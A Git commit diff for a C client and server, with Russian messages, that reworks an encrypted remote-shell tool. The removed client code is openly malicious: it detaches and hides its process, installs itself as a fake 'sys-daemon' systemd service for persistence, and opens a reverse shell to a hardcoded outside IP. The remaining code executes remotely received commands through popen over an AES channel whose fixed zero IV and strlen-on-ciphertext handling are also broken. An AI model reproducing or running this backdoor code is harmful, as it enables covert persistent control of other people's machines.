letsgo
This commit is contained in:
wheelchairy
parent
95fef97809
commit
64e77a20f1
128
client.c
128
client.c
@ -2,102 +2,90 @@
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <unistd.h>
|
||||
#include <fcntl.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/types.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <netinet/in.h>
|
||||
#include <openssl/aes.h>
|
||||
#include <openssl/evp.h>
|
||||
#include <openssl/sha.h>
|
||||
#include <openssl/rand.h>
|
||||
|
||||
#define SERVER_IP "212.113.119.5"
|
||||
#define PORT_MIN 2000
|
||||
#define PORT_MAX 3000
|
||||
#define PORT 4444
|
||||
#define AES_KEY_SIZE 16
|
||||
#define AES_BLOCK_SIZE 16
|
||||
|
||||
unsigned char AES_KEY[AES_KEY_SIZE];
|
||||
unsigned char key[AES_KEY_SIZE];
|
||||
|
||||
void generate_aes_key() {
|
||||
FILE *fp = popen("cat /sys/class/dmi/id/product_uuid", "r");
|
||||
char buffer[256];
|
||||
if (fp == NULL || fgets(buffer, sizeof(buffer), fp) == NULL) {
|
||||
pclose(fp);
|
||||
RAND_bytes(AES_KEY, AES_KEY_SIZE);
|
||||
RAND_bytes(key, AES_KEY_SIZE);
|
||||
} else {
|
||||
pclose(fp);
|
||||
SHA256((unsigned char *)buffer, strlen(buffer), AES_KEY);
|
||||
SHA256((unsigned char *)buffer, strlen(buffer), key);
|
||||
}
|
||||
}
|
||||
|
||||
void encrypt(char *input, char *output) {
|
||||
AES_KEY enc_key;
|
||||
AES_set_encrypt_key(AES_KEY, 128, &enc_key);
|
||||
AES_encrypt((unsigned char *)input, (unsigned char *)output, &enc_key);
|
||||
void encrypt_data(unsigned char *plaintext, unsigned char *ciphertext) {
|
||||
EVP_CIPHER_CTX *ctx = EVP_CIPHER_CTX_new();
|
||||
int len, ciphertext_len;
|
||||
unsigned char iv[AES_BLOCK_SIZE] = {0};
|
||||
|
||||
EVP_EncryptInit_ex(ctx, EVP_aes_128_cbc(), NULL, key, iv);
|
||||
EVP_EncryptUpdate(ctx, ciphertext, &len, plaintext, strlen((char *)plaintext));
|
||||
ciphertext_len = len;
|
||||
EVP_EncryptFinal_ex(ctx, ciphertext + len, &len);
|
||||
ciphertext_len += len;
|
||||
|
||||
EVP_CIPHER_CTX_free(ctx);
|
||||
}
|
||||
|
||||
void decrypt(char *input, char *output) {
|
||||
AES_KEY dec_key;
|
||||
AES_set_decrypt_key(AES_KEY, 128, &dec_key);
|
||||
AES_decrypt((unsigned char *)input, (unsigned char *)output, &dec_key);
|
||||
}
|
||||
void decrypt_data(unsigned char *ciphertext, unsigned char *plaintext) {
|
||||
EVP_CIPHER_CTX *ctx = EVP_CIPHER_CTX_new();
|
||||
int len, plaintext_len;
|
||||
unsigned char iv[AES_BLOCK_SIZE] = {0};
|
||||
|
||||
void hide_process() {
|
||||
setsid();
|
||||
chdir("/");
|
||||
fclose(stdin);
|
||||
fclose(stdout);
|
||||
fclose(stderr);
|
||||
}
|
||||
EVP_DecryptInit_ex(ctx, EVP_aes_128_cbc(), NULL, key, iv);
|
||||
EVP_DecryptUpdate(ctx, plaintext, &len, ciphertext, strlen((char *)ciphertext));
|
||||
plaintext_len = len;
|
||||
EVP_DecryptFinal_ex(ctx, plaintext + len, &len);
|
||||
plaintext_len += len;
|
||||
|
||||
void persist() {
|
||||
char path[128], dest[128];
|
||||
snprintf(path, sizeof(path), "/proc/%d/exe", getpid());
|
||||
snprintf(dest, sizeof(dest), "/usr/local/bin/sys-daemon");
|
||||
|
||||
if (access(dest, F_OK) != 0) {
|
||||
system("cp /proc/self/exe /usr/local/bin/sys-daemon");
|
||||
system("chmod +x /usr/local/bin/sys-daemon");
|
||||
system("echo '[Unit]\nDescription=System Daemon\nAfter=network.target\n[Service]\nExecStart=/usr/local/bin/sys-daemon\nRestart=always\n[Install]\nWantedBy=multi-user.target' > /etc/systemd/system/sys-daemon.service");
|
||||
system("systemctl enable sys-daemon.service && systemctl start sys-daemon.service");
|
||||
}
|
||||
}
|
||||
|
||||
void reverse_shell(int port) {
|
||||
int sock;
|
||||
struct sockaddr_in server;
|
||||
char buffer[1024], encrypted[1024], decrypted[1024];
|
||||
|
||||
sock = socket(AF_INET, SOCK_STREAM, 0);
|
||||
server.sin_family = AF_INET;
|
||||
server.sin_addr.s_addr = inet_addr(SERVER_IP);
|
||||
server.sin_port = htons(port);
|
||||
|
||||
if (connect(sock, (struct sockaddr *)&server, sizeof(server)) < 0) {
|
||||
close(sock);
|
||||
return;
|
||||
}
|
||||
|
||||
while (1) {
|
||||
recv(sock, encrypted, sizeof(encrypted), 0);
|
||||
decrypt(encrypted, decrypted);
|
||||
|
||||
FILE *fp = popen(decrypted, "r");
|
||||
fread(buffer, 1, sizeof(buffer), fp);
|
||||
pclose(fp);
|
||||
|
||||
encrypt(buffer, encrypted);
|
||||
send(sock, encrypted, sizeof(encrypted), 0);
|
||||
}
|
||||
|
||||
close(sock);
|
||||
plaintext[plaintext_len] = '\0';
|
||||
EVP_CIPHER_CTX_free(ctx);
|
||||
}
|
||||
|
||||
int main() {
|
||||
generate_aes_key();
|
||||
persist();
|
||||
hide_process();
|
||||
printf("[+] AES-ключ клиента сгенерирован\n");
|
||||
|
||||
int port = PORT_MIN + (rand() % (PORT_MAX - PORT_MIN + 1));
|
||||
reverse_shell(port);
|
||||
int sock;
|
||||
struct sockaddr_in server;
|
||||
unsigned char buffer[1024], encrypted[1024], decrypted[1024];
|
||||
|
||||
sock = socket(AF_INET, SOCK_STREAM, 0);
|
||||
server.sin_family = AF_INET;
|
||||
server.sin_addr.s_addr = inet_addr(SERVER_IP);
|
||||
server.sin_port = htons(PORT);
|
||||
|
||||
if (connect(sock, (struct sockaddr *)&server, sizeof(server)) < 0) {
|
||||
close(sock);
|
||||
return 1;
|
||||
}
|
||||
|
||||
while (1) {
|
||||
printf("Shell> ");
|
||||
fgets(buffer, sizeof(buffer), stdin);
|
||||
|
||||
encrypt_data(buffer, encrypted);
|
||||
send(sock, encrypted, sizeof(encrypted), 0);
|
||||
|
||||
recv(sock, encrypted, sizeof(encrypted), 0);
|
||||
decrypt_data(encrypted, decrypted);
|
||||
printf("%s\n", decrypted);
|
||||
}
|
||||
|
||||
close(sock);
|
||||
return 0;
|
||||
}
|
||||
|
||||
59
server.c
59
server.c
@ -4,15 +4,15 @@
|
||||
#include <sys/socket.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <unistd.h>
|
||||
#include <openssl/aes.h>
|
||||
#include <openssl/evp.h>
|
||||
#include <openssl/sha.h>
|
||||
#include <openssl/rand.h>
|
||||
|
||||
#define PORT_MIN 2000
|
||||
#define PORT_MAX 3000
|
||||
#define PORT 4444
|
||||
#define AES_KEY_SIZE 16
|
||||
#define SERVER_IP "212.113.119.5"
|
||||
#define AES_BLOCK_SIZE 16
|
||||
|
||||
unsigned char AES_KEY[AES_KEY_SIZE]; // Хранение AES-ключа
|
||||
unsigned char key[AES_KEY_SIZE];
|
||||
|
||||
void generate_aes_key() {
|
||||
FILE *fp = popen("cat /sys/class/dmi/id/product_uuid", "r");
|
||||
@ -20,23 +20,40 @@ void generate_aes_key() {
|
||||
if (fp == NULL || fgets(buffer, sizeof(buffer), fp) == NULL) {
|
||||
pclose(fp);
|
||||
printf("[-] Не удалось получить UUID, используем случайный ключ\n");
|
||||
RAND_bytes(AES_KEY, AES_KEY_SIZE);
|
||||
RAND_bytes(key, AES_KEY_SIZE);
|
||||
} else {
|
||||
pclose(fp);
|
||||
SHA256((unsigned char *)buffer, strlen(buffer), AES_KEY);
|
||||
SHA256((unsigned char *)buffer, strlen(buffer), key);
|
||||
}
|
||||
}
|
||||
|
||||
void encrypt(char *input, char *output) {
|
||||
AES_KEY enc_key;
|
||||
AES_set_encrypt_key(AES_KEY, 128, &enc_key);
|
||||
AES_encrypt((unsigned char *)input, (unsigned char *)output, &enc_key);
|
||||
void encrypt_data(unsigned char *plaintext, unsigned char *ciphertext) {
|
||||
EVP_CIPHER_CTX *ctx = EVP_CIPHER_CTX_new();
|
||||
int len, ciphertext_len;
|
||||
unsigned char iv[AES_BLOCK_SIZE] = {0};
|
||||
|
||||
EVP_EncryptInit_ex(ctx, EVP_aes_128_cbc(), NULL, key, iv);
|
||||
EVP_EncryptUpdate(ctx, ciphertext, &len, plaintext, strlen((char *)plaintext));
|
||||
ciphertext_len = len;
|
||||
EVP_EncryptFinal_ex(ctx, ciphertext + len, &len);
|
||||
ciphertext_len += len;
|
||||
|
||||
EVP_CIPHER_CTX_free(ctx);
|
||||
}
|
||||
|
||||
void decrypt(char *input, char *output) {
|
||||
AES_KEY dec_key;
|
||||
AES_set_decrypt_key(AES_KEY, 128, &dec_key);
|
||||
AES_decrypt((unsigned char *)input, (unsigned char *)output, &dec_key);
|
||||
void decrypt_data(unsigned char *ciphertext, unsigned char *plaintext) {
|
||||
EVP_CIPHER_CTX *ctx = EVP_CIPHER_CTX_new();
|
||||
int len, plaintext_len;
|
||||
unsigned char iv[AES_BLOCK_SIZE] = {0};
|
||||
|
||||
EVP_DecryptInit_ex(ctx, EVP_aes_128_cbc(), NULL, key, iv);
|
||||
EVP_DecryptUpdate(ctx, plaintext, &len, ciphertext, strlen((char *)ciphertext));
|
||||
plaintext_len = len;
|
||||
EVP_DecryptFinal_ex(ctx, plaintext + len, &len);
|
||||
plaintext_len += len;
|
||||
|
||||
plaintext[plaintext_len] = '\0';
|
||||
EVP_CIPHER_CTX_free(ctx);
|
||||
}
|
||||
|
||||
int main() {
|
||||
@ -46,32 +63,30 @@ int main() {
|
||||
int server_sock, client_sock;
|
||||
struct sockaddr_in server, client;
|
||||
socklen_t client_size = sizeof(client);
|
||||
char buffer[1024], encrypted[1024], decrypted[1024];
|
||||
|
||||
int port = PORT_MIN + (rand() % (PORT_MAX - PORT_MIN + 1));
|
||||
unsigned char buffer[1024], encrypted[1024], decrypted[1024];
|
||||
|
||||
server_sock = socket(AF_INET, SOCK_STREAM, 0);
|
||||
server.sin_family = AF_INET;
|
||||
server.sin_addr.s_addr = INADDR_ANY;
|
||||
server.sin_port = htons(port);
|
||||
server.sin_port = htons(PORT);
|
||||
|
||||
bind(server_sock, (struct sockaddr *)&server, sizeof(server));
|
||||
listen(server_sock, 1);
|
||||
|
||||
printf("[+] Сервер слушает на порту %d...\n", port);
|
||||
printf("[+] Сервер слушает на порту %d...\n", PORT);
|
||||
client_sock = accept(server_sock, (struct sockaddr *)&client, &client_size);
|
||||
printf("[+] Подключение от %s\n", inet_ntoa(client.sin_addr));
|
||||
|
||||
while (1) {
|
||||
recv(client_sock, encrypted, sizeof(encrypted), 0);
|
||||
decrypt(encrypted, decrypted);
|
||||
decrypt_data(encrypted, decrypted);
|
||||
printf("Команда: %s\n", decrypted);
|
||||
|
||||
FILE *fp = popen(decrypted, "r");
|
||||
fread(buffer, 1, sizeof(buffer), fp);
|
||||
pclose(fp);
|
||||
|
||||
encrypt(buffer, encrypted);
|
||||
encrypt_data(buffer, encrypted);
|
||||
send(client_sock, encrypted, sizeof(encrypted), 0);
|
||||
}
|
||||
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user